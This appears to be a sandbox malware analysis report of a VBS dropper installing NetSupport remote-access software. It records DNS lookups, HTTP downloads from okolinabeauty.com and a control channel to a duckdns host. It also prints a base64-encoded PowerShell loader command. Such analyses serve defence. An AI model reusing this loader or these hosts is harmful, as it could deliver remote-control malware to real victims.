                                                                                                                      Nov 23, 2024 02:37:57.151782036 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.155457973 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.155471087 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.155544996 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.155550957 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.155595064 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.318584919 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.318598986 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.318809032 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.318815947 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.318861008 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.322392941 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.322407961 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.322496891 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.322501898 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.322554111 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.326988935 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.327003002 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.327070951 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.327075958 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.327116013 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.330770969 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.330784082 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.330867052 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.330872059 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.330926895 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.335448980 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.335464001 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.335540056 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.335542917 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.335588932 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.338953972 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.338970900 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.339032888 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.339037895 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.339072943 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.343605042 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.343616962 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.343687057 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.343693018 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.343734980 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.347414017 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.347426891 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.347491980 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.347496986 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.347539902 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.510540962 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.510560036 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.510637999 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.510646105 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.510690928 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.514348984 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.514364004 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.514435053 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.514440060 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.514487028 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.518940926 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.518954039 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.519037008 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.519042015 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.519093990 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.523236036 CET44349732176.126.113.166192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 23, 2024 02:37:07.829821110 CET | 192.168.2.4 | 1.1.1.1 | 0x3f39 | Standard query (0) | okolinabeauty.com | A (IP address) | IN (0x0001) | false
Nov 23, 2024 02:38:38.075795889 CET | 192.168.2.4 | 1.1.1.1 | 0x7b4b | Standard query (0) | geo.netsupportsoftware.com | A (IP address) | IN (0x0001) | false
Nov 23, 2024 02:38:40.086179018 CET | 192.168.2.4 | 1.1.1.1 | 0xbf5d | Standard query (0) | megaeth1337.duckdns.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 23, 2024 02:37:08.225605965 CET | 1.1.1.1 | 192.168.2.4 | 0x3f39 | No error (0) | okolinabeauty.com |  | 176.126.113.166 | A (IP address) | IN (0x0001) | false
Nov 23, 2024 02:38:38.307810068 CET | 1.1.1.1 | 192.168.2.4 | 0x7b4b | No error (0) | geo.netsupportsoftware.com |  | 104.26.0.231 | A (IP address) | IN (0x0001) | false
Nov 23, 2024 02:38:38.307810068 CET | 1.1.1.1 | 192.168.2.4 | 0x7b4b | No error (0) | geo.netsupportsoftware.com |  | 104.26.1.231 | A (IP address) | IN (0x0001) | false
Nov 23, 2024 02:38:38.307810068 CET | 1.1.1.1 | 192.168.2.4 | 0x7b4b | No error (0) | geo.netsupportsoftware.com |  | 172.67.68.212 | A (IP address) | IN (0x0001) | false
Nov 23, 2024 02:38:40.404251099 CET | 1.1.1.1 | 192.168.2.4 | 0xbf5d | No error (0) | megaeth1337.duckdns.org |  | 185.170.144.66 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49826 | 104.26.0.231 | 80 | 2676 | C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 23, 2024 02:38:38.477178097 CET118OUTGET /location/loca.asp HTTP/1.1
                                                                                                                      Host: geo.netsupportsoftware.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cache-Control: no-cache
Nov 23, 2024 02:38:39.978292942 CET | 966 | IN | HTTP/1.1 200 OK
                                                                                                                      Date: Sat, 23 Nov 2024 01:38:39 GMT
                                                                                                                      Content-Type: text/html; Charset=utf-8
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: keep-alive
                                                                                                                      CF-Ray: 8e6d70e48b7b6a5f-EWR
                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Cache-Control: private
                                                                                                                      Set-Cookie: ASPSESSIONIDQQCBTTCT=GEHFDOODLDNCLDIIIIMNKKNL; path=/
                                                                                                                      cf-apo-via: origin,host
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Powered-By: ASP.NET
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I1UpHidjZ7%2BUKJXviXUJTQFKB%2F6CcZBkAnradnOHc1TK7hHXi7t8ITK%2FGCr1cMJUvDi5VQke4UVhy9JeQ0ah3haMQKzyMlnWSY7DJFyr%2Bz6k2xS%2FwW0Eha0fk0vLU6vf%2BYqMAQ%2F2mHtwqYfY"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1694&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=178&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Data Raw: 31 30 0d 0a 34 30 2e 37 33 35 37 2c 2d 37 34 2e 31 37 32 34 0d 0a
Data Ascii: 10\r\n40.7357,-74.1724\r\n
Nov 23, 2024 02:38:40.219506979 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0\r\n\r\n


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49832 | 185.170.144.66 | 1773 | 2676 | C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
Timestamp | Bytes transferred | Direction | Data
Nov 23, 2024 02:38:40.549415112 CET | 203 | OUT | GET / HTTP/1.1
                                                                                                                      Connection: Upgrade
                                                                                                                      Upgrade: websocket
                                                                                                                      User-Agent: NetSupport Manager/1.3
                                                                                                                      Sec-WebSocket-Key: 9Bnq7QJqg8kCGoqK+ufHdg==
                                                                                                                      Sec-WebSocket-Version: 13
                                                                                                                      Host: megaeth1337.duckdns.org:1773
Nov 23, 2024 02:38:41.882121086 CET | 129 | IN | HTTP/1.1 101 Switching Protocols
                                                                                                                      Upgrade: websocket
                                                                                                                      Connection: Upgrade
                                                                                                                      Sec-WebSocket-Accept: LquSmZ5Hh0o225e2w+YQyViOEy4=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 176.126.113.166 | 443 | 2496 | C:\Windows\SysWOW64\wscript.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-23 01:37:10 UTC | 313 | OUT | GET /choh/NSM.lic HTTP/1.1
                                                                                                                      Accept: */*
                                                                                                                      Accept-Language: en-ch
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                      Host: okolinabeauty.com
                                                                                                                      Connection: Keep-Alive
2024-11-23 01:37:10 UTC | 240 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Sat, 23 Nov 2024 01:37:10 GMT
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      Content-Length: 253
                                                                                                                      Last-Modified: Tue, 12 Nov 2024 14:38:33 GMT
                                                                                                                      Connection: close
                                                                                                                      ETag: "67336869-fd"
                                                                                                                      Accept-Ranges: bytes
2024-11-23 01:37:10 UTC | 253 | IN | Data Ascii:
1400
0x98f177db

; NetSupport License File.
; Generated on 02:59 - 15/09/2022



[[Enforce]]

[_License]
control_only=0
expiry=
inactive=0
licensee=NSM1234
maxslaves=9999
os2=1
product=10
serial_no=NSM1234
shrink_wrap=0
transport=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49731 | 176.126.113.166 | 443 | 2496 | C:\Windows\SysWOW64\wscript.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-23 01:37:11 UTC | 318 | OUT | GET /choh/Client32.ini HTTP/1.1
                                                                                                                      Accept: */*
                                                                                                                      Accept-Language: en-ch
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                      Host: okolinabeauty.com
                                                                                                                      Connection: Keep-Alive
2024-11-23 01:37:12 UTC | 241 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Sat, 23 Nov 2024 01:37:12 GMT
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      Content-Length: 837
                                                                                                                      Last-Modified: Tue, 12 Nov 2024 14:38:33 GMT
                                                                                                                      Connection: close
                                                                                                                      ETag: "67336869-345"
                                                                                                                      Accept-Ranges: bytes
2024-11-23 01:37:12 UTC | 837 | IN | Data Ascii:
0xa7cd73d8

[Client]
_present=1
DisableChat=1
DisableChatMenu=1
DisableClientConnect=1
DisableCloseApps=0
DisableDisconnect=1
DisableLocalInventory=1
DisableManageServices=0
DisableMessage=1
DisableReplayMenu=1
DisableRequestHelp=1
IgnoreBro


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49732 | 176.126.113.166 | 443 | 2496 | C:\Windows\SysWOW64\wscript.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-23 01:37:13 UTC | 314 | OUT | GET /choh/vrep.msi HTTP/1.1
                                                                                                                      Accept: */*
                                                                                                                      Accept-Language: en-ch
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                      Host: okolinabeauty.com
                                                                                                                      Connection: Keep-Alive
2024-11-23 01:37:14 UTC | 250 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Sat, 23 Nov 2024 01:37:14 GMT
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      Content-Length: 41645568
                                                                                                                      Last-Modified: Tue, 12 Nov 2024 14:38:35 GMT
                                                                                                                      Connection: close
                                                                                                                      ETag: "6733686b-27b7600"
                                                                                                                      Accept-Ranges: bytes


                                                                                                                      Target ID:0
                                                                                                                      Start time:20:37:01
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Windows\System32\wscript.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pyyidau.vbs"
                                                                                                                      Imagebase:0x7ff6bea90000
                                                                                                                      File size:170'496 bytes
                                                                                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:1
                                                                                                                      Start time:20:37:02
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\Pyyidau.vbs.exe" /Y
                                                                                                                      Imagebase:0x7ff758890000
                                                                                                                      File size:289'792 bytes
                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:2
                                                                                                                      Start time:20:37:02
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:3
                                                                                                                      Start time:20:37:04
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Users\user\Desktop\Pyyidau.vbs.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\Desktop\Pyyidau.vbs.exe" -enc JABBAHEAdwB3AHMAYwAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQAuAFIAZQBwAGwAYQBjAGUAKAAnAC4AZQB4AGUAJwAsACcAJwApADsAJABHAHkAaQBlAHAAZwBrAHcAdgByACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQAQQBxAHcAdwBzAGMAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ATABhAHMAdAAgADEAOwAgACQAWABzAGwAbQB3AG0AbwBxAGcAawB6ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEcAeQBpAGUAcABnAGsAdwB2AHIALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAEkAdwBxAGIAdwBjACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAIAAsACAAJABYAHMAbABtAHcAbQBvAHEAZwBrAHoAIAApADsAJABFAG0AYgBtAGUAcwBqAHMAbAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQAUgB3AHAAdQB4AHcAYQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABJAHcAcQBiAHcAYwAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAUgB3AHAAdQB4AHcAYQAuAEMAbwBwAHkAVABvACgAIAAkAEUAbQBiAG0AZQBzAGoAcwBsACAAKQA7ACQAUgB3AHAAdQB4AHcAYQAuAEMAbABvAHMAZQAoACkAOwAkAEkAdwBxAGIAdwBjAC4AQwBsAG8AcwBlACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAgACQAWABzAGwAbQB3AG0AbwBxAGcAawB6ACAAPQAgACQARQBtAGIAbQBlAHMAagBzAGwALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAFgAcwBsAG0AdwBtAG8AcQBnAGsAegApADsAIAAkAE4AZgBrAGYAZwB0AHQAcgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABoAHIAZQBhAGQAaQBuAGcALgBUAGgAcgBlAGEAZABdADoAOgBHAGUAdABEAG8AbQBhAGkAbgAoACkALgBMAG8AYQBkACgAJABYAHMAbABtAHcAbQBvAHEAZ
wBrAHoAKQA7ACAAJABBAHYAZgBuAHgAdQBrAG4AcgBtAG0AIAA9ACAAJABOAGYAawBmAGcAdAB0AHIALgBFAG4AdAByAHkAUABvAGkAbgB0ADsAIABbAFMAeQBzAHQAZQBtAC4ARABlAGwAZQBnAGEAdABlAF0AOgA6AEMAcgBlAGEAdABlAEQAZQBsAGUAZwBhAHQAZQAoAFsAQQBjAHQAaQBvAG4AXQAsACAAJABBAHYAZgBuAHgAdQBrAG4AcgBtAG0ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAEEAdgBmAG4AeAB1AGsAbgByAG0AbQAuAE4AYQBtAGUAKQAuAEQAeQBuAGEAbQBpAGMASQBuAHYAbwBrAGUAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=
                                                                                                                      Imagebase:0x270000
                                                                                                                      File size:433'152 bytes
                                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.1883031177.000000000BB10000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.1825322765.0000000004AD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:4
                                                                                                                      Start time:20:37:04
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:5
                                                                                                                      Start time:20:37:06
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\50d669f573135aafd57c..vbs"
                                                                                                                      Imagebase:0x820000
                                                                                                                      File size:147'456 bytes
                                                                                                                      MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000003.2439151550.0000000008DD0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000003.2456677584.0000000005E63000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000003.2453934056.000000000B614000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000003.2454210130.000000000B614000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000003.2455334046.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000003.2454210130.000000000B656000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000003.2439151550.0000000008FC0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:6
                                                                                                                      Start time:20:37:07
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                      Imagebase:0x10000
                                                                                                                      File size:65'440 bytes
                                                                                                                      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:7
                                                                                                                      Start time:20:37:07
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                      Imagebase:0x700000
                                                                                                                      File size:65'440 bytes
                                                                                                                      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:8
                                                                                                                      Start time:20:37:07
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                      Imagebase:0x770000
                                                                                                                      File size:65'440 bytes
                                                                                                                      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:9
                                                                                                                      Start time:20:37:08
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                      Imagebase:0x2f0000
                                                                                                                      File size:65'440 bytes
                                                                                                                      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:10
                                                                                                                      Start time:20:37:08
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                      Imagebase:0xac0000
                                                                                                                      File size:65'440 bytes
                                                                                                                      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:11
                                                                                                                      Start time:20:37:08
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                      Imagebase:0x610000
                                                                                                                      File size:65'440 bytes
                                                                                                                      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:12
                                                                                                                      Start time:20:37:09
                                                                                                                      Start date:22/11/2024
